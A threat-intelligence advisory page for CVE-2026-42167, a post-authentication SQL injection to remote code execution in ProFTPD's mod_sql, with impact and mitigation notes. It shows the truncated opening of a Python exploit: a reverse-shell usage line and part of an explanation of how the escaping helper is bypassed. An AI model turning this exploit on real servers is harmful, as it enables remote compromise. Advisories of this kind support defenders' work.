CVE-2026-42167 - ProFTPD mod_sql post-authentication SQLi - RCE
Description
CVE-2026-42167 is a critical vulnerability in ProFTPD's mod_sql module that allows post-authentication SQL injection leading to remote code execution (RCE).
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
This vulnerability, identified as CVE-2026-42167, affects the mod_sql module of ProFTPD. It enables an attacker who has authenticated access to perform SQL injection attacks, which can escalate to remote code execution on the affected system. No specific affected versions or patch information are provided in the available data.
Potential Impact
Successful exploitation of this vulnerability could allow an authenticated attacker to execute arbitrary code remotely on the server running the vulnerable ProFTPD mod_sql module, potentially leading to full system compromise.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, restrict access to the ProFTPD service to trusted users only and monitor for unusual activity related to mod_sql usage.
Technical Details
- Cve
- CVE-2026-42167
- Edb Id
- 52658
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for CVE-2026-42167 - ProFTPD mod_sql post-authentication SQLi - RCE
#!/usr/bin/env python3 """ CVE-2026-42167 — ProFTPD mod_sql post-authentication SQL injection -> RCE postauth_stor_rce.py --host <ftp-host> --port 21 \ --user <user> --password <pass> \ --shell-host <your-ip> --shell-port 443 SUMMARY ------- ProFTPD's mod_sql logs FTP activity through user-supplied SQL. Its escaping helper is_escaped_text() treats any value that BEGINS and ENDS with a single quote and contains no interior single quote as "already escaped", and passes it int... (9706 more characters)
Threat ID: 6a8f2457acd9273b493164bc
Added to database: 08/26/2026, 17:37:27 UTC
Last enriched: 10/07/2026, 22:43:43 UTC
Last updated: 10/10/2026, 22:36:09 UTC
Views: 97
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.